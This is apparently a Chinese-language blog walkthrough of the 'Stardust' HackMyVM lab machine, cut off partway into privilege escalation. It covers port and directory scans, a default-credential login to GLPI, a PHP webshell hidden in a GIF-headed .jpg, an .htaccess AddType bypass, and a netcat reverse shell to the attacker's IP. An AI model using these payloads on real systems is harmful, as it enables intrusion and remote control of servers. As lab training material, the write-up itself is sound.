{"id":657,"date":"2024-04-29T00:18:33","date_gmt":"2024-04-28T16:18:33","guid":{"rendered":"http:\/\/162.14.82.114\/?p=657"},"modified":"2024-04-29T00:18:33","modified_gmt":"2024-04-28T16:18:33","slug":"hmv-_-stardust","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/657\/04\/29\/2024\/","title":{"rendered":"hmv[-_-]Stardust"},"content":{"rendered":"<h1>Stardust<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016742.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016742.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428124442859\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016744.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016744.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428204422665\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ rustscan -a 192.168.0.175 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.175:80\nOpen 192.168.0.175:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-title: Authentication - GLPI\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.56 (Debian)\n|_http-favicon: Unknown favicon MD5: C01D32D71C01C8426D635C68C4648B09\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.175\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.175\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 9137]\n\/templates            (Status: 301) [Size: 318] [--&gt; http:\/\/192.168.0.175\/templates\/]\n\/resources            (Status: 301) [Size: 318] [--&gt; http:\/\/192.168.0.175\/resources\/]\n\/.html                (Status: 403) [Size: 278]\n\/files                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.175\/files\/]\n\/pics                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.175\/pics\/]\n\/public               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.175\/public\/]\n\/version              (Status: 301) [Size: 316] [--&gt; http:\/\/192.168.0.175\/version\/]\n\/bin                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.175\/bin\/]\n\/plugins              (Status: 301) [Size: 316] [--&gt; http:\/\/192.168.0.175\/plugins\/]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.175\/css\/]\n\/ajax                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.175\/ajax\/]\n\/install              (Status: 301) [Size: 316] [--&gt; http:\/\/192.168.0.175\/install\/]\n\/lib                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.175\/lib\/]\n\/src                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.175\/src\/]\n\/status.php           (Status: 200) [Size: 115]\n\/front                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.175\/front\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.175\/js\/]\n\/marketplace          (Status: 301) [Size: 320] [--&gt; http:\/\/192.168.0.175\/marketplace\/]\n\/vendor               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.175\/vendor\/]\n\/config               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.175\/config\/]\n\/inc                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.175\/inc\/]\n\/sound                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.175\/sound\/]\n\/LICENSE              (Status: 200) [Size: 35148]\n\/locales              (Status: 301) [Size: 316] [--&gt; http:\/\/192.168.0.175\/locales\/]\n\/glpi                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.175\/glpi\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\n\/caldav.php           (Status: 401) [Size: 354]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ curl -s http:\/\/192.168.0.175\/ | html2text | uniq\n\n***** Login to your account *****\nLogin [fielda662e452b70be1 ]\n Password  [********************]\nLogin source [One of: GLPI internal database]\n * Remember me\n Sign in\nGLPI_Copyright_(C)_2015-2023_Teclib&#039;_and_contributors<\/code><\/pre>\n<p>\u770b\u4e0a\u53bb\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5148\u4e0d\u6025\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/stardust]\n\u2514\u2500$ whatweb http:\/\/192.168.0.175\/                                                                                                        \nhttp:\/\/192.168.0.175\/ [200 OK] Apache[2.4.56], Cookies[glpi_40d1b2d83998fabacb726e5bc3d22129], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.56 (Debian)], IP[192.168.0.175], PasswordField[fieldb662e4577b8bd7], PoweredBy[Teclib], Script[text\/javascript], Title[Authentication - GLPI], X-UA-Compatible[IE=edge]<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016745.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016745.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428204841444\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u9ed8\u8ba4\u7528\u6237\u767b\u5f55<\/h3>\n<p>\u6ca1\u6709\u627e\u5230\u76f8\u5173\u7684\u7248\u672c\u53f7\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u90fd\u4e0d\u5bf9\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u9ed8\u8ba4\u7528\u6237\u662f\u5426\u53ef\u4ee5\u8fdb\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016746.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016746.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428205359851\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016747.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016747.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428205445697\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\uff01\u5230\u5904\u901b\u901b\uff0c\u770b\u770b\u6709\u6ca1\u6709\u7248\u672c\u53f7\u548c\u4e0a\u4f20\u7684\u5730\u65b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016748.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016748.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428210655493\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016749.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016749.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428205644156\" \/><\/div><\/p>\n<h3>\u9690\u85cf\u754c\u9762<\/h3>\n<p>\u627e\u5230\u51e0\u4e2a\u7528\u6237\uff01\u4ee5\u53ca\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-apl\">192.168.0.175   intranetik.stardust.hmv<\/code><\/pre>\n<p>\u6dfb\u52a0dns\u89e3\u6790\uff0c\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016750.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016750.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428211040562\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6587\u4ef6\u4e0a\u4f20\uff0c\u5c1d\u8bd5\u9690\u85cf\u4e3a<code>jpg<\/code>\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016751.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016751.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428211218526\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<p>\u626b\u63cf\u4e00\u4e0b\u8fd9\u4e2a\u57df\u540d\uff0c\u627e\u4e00\u4e0b\u4e0a\u4f20\u5230\u54ea\u91cc\u53bb\u4e86\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ gobuster dir -u http:\/\/intranetik.stardust.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt                            \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/intranetik.stardust.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server-status        (Status: 403) [Size: 288]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u989d\uff0c\u8fd9\u53ef\u548b\u6574\u3002\u3002\u3002\u3002\u90a3\u5c31\u731c\u4e00\u624b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016752.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016752.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428211617331\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6293\u5305\u4e0a\u4f20\u4f46\u662f\u6ca1\u6709\u6210\u529f\uff0c\u591a\u4e2a\u540e\u7f00\u540d\u90fd\u65e0\u6cd5\u751f\u6548\uff0c\u6539\u4e3a\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ vim revshell.jpg    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ cat revshell.jpg                                    \nGIF89a\n&lt;?php system($_GET[&#039;hack&#039;]); ?&gt;<\/code><\/pre>\n<p>\u91cd\u65b0\u4e0a\u4f20\u4e00\u4e0b\uff0c\u7136\u540e\u89e6\u53d1\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016753.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016753.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428212605453\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5931\u8d25\u4e86\uff1f\u91cd\u65b0\u8bd5\u4e00\u6b21\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ echo &#039;GIF89a; &lt;?php system($_GET[hack]);?&gt;&#039; &gt; shell.jpg\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Downloads]\n\u2514\u2500$ curl http:\/\/intranetik.stardust.hmv\/shell.jpg               \nGIF89a; &lt;?php system($_GET[hack]);?&gt;<\/code><\/pre>\n<p>\u4f46\u662f\u6267\u884c\u4e0d\u4e86\u547d\u4ee4\uff0c\u5c1d\u8bd5\u6dfb\u52a0\u914d\u7f6e\u6587\u4ef6\uff0c\u5141\u8bb8\u6267\u884c\u8f93\u51fa\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;AddType application\/x-httpd-php .jpg&#039; &gt; .htaccess<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016754.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016754.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428215358632\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6267\u884c\u4e86\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">http:\/\/intranetik.stardust.hmv\/revshell.jpg?hack=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016755.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404290016755.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428215636889\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@stardust.hmv:\/var\/www\/intranetik$ cd ..\n(remote) www-data@stardust.hmv:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x  4 www-data www-data 4096 May  8  2023 .\ndrwxr-xr-x 12 root     root     4096 May  4  2023 ..\nlrwxrwxrwx  1 root     root        9 May  8  2023 .bash_history -&gt; \/dev\/null\ndrwxr-xr-x 25 www-data www-data 4096 May  6  2023 html\ndrwxr-xr-x  2 www-data www-data 4096 Apr 28 15:51 intranetik\n(remote) www-data@stardust.hmv:\/var\/www$ cd html\n(remote) www-data@stardust.hmv:\/var\/www\/html$ ls -la\ntotal 348\ndrwxr-xr-x 25 www-data www-data  4096 May  6  2023 .\ndrwxr-xr-x  4 www-data www-data  4096 May  8  2023 ..\n-rwxr-xr-x  1 www-data www-data 41890 May  6  2023 CHANGELOG.md\n-rwxr-xr-x  1 www-data www-data  2060 May  6  2023 CONTRIBUTING.md\n-rwxr-xr-x  1 www-data www-data 35148 May  6  2023 LICENSE\n-rwxr-xr-x  1 www-data www-data  6029 May  6  2023 README.md\n-rwxr-xr-x  1 www-data www-data   481 May  6  2023 SUPPORT.md\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 ajax\n-rwxr-xr-x  1 www-data www-data 62086 May  6  2023 apirest.md\n-rwxr-xr-x  1 www-data www-data  1594 May  6  2023 apirest.php\n-rwxr-xr-x  1 www-data www-data  1561 May  6  2023 apixmlrpc.php\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 bin\n-rwxr-xr-x  1 www-data www-data  1460 May  6  2023 caldav.php\ndrwxr-xr-x  2 www-data www-data  4096 May  6  2023 config\ndrwxr-xr-x  7 www-data www-data  